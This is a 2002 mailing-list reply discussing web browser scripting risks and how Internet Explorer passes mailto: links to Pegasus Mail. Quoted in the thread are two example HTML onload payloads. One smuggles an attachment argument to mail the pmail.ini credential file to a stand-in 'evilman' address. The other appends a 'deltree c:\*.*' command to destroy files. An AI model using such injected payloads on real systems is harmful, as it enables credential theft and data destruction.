Re: techport80
- Posted by Kat <kat at kogeijin.com> Sep 20, 2002
- 504 views
On 20 Sep 2002, at 18:22, Martin Stachon wrote: > > Kat wrote: > > > Kat wrote: > > > > If you have IE 6.x it may be a bit harder to disable Java, since MS has > > > > taken > > > > > > > > away many of those settings which allow you to close the backdoors and > > > > loopholes. Javascript is even worse. Do you want to show webpages, or do > > > > you want people to open up their computers to any ole script kiddie? If > > > > you require me to breach security on my computers to see your webpages, > > > > let me assure you it's not worth it. > > > > > > You are never safe on a system where web broswer runs under root > > > privilegies. Even with all scripting disabled. > > > > > > Eg. with Pegasus Mail v3.12c and IE using this HTML: > > > > > > <body onload="mailto:evilman at here.com -F > > > c:\pmail\mail\Kat\pmail.ini"> > > > > > > I can possibly obtain your POP3 password. Or this : > > > > > > <body onload="mailto:evilman at here.com -F c:\test.txt | deltree > > > c:\*.*"> > > > > > > may delete some files. > > > > Too bad i intentionally didn't download all the Pegasus display/scripting > > files, and Pegasus has no clue where the IE display engine is, eh?> > It has nothing to do with the display engine, just the way MSIE passes > mailto: to Pegasus. Oh, you meant a webpage click passing to email, i thought you meant recieving html email into Pegasus. Still, my IE doesn't know about Pegasus either, and i won't use Outlook Express. I copy/paste the address. Kat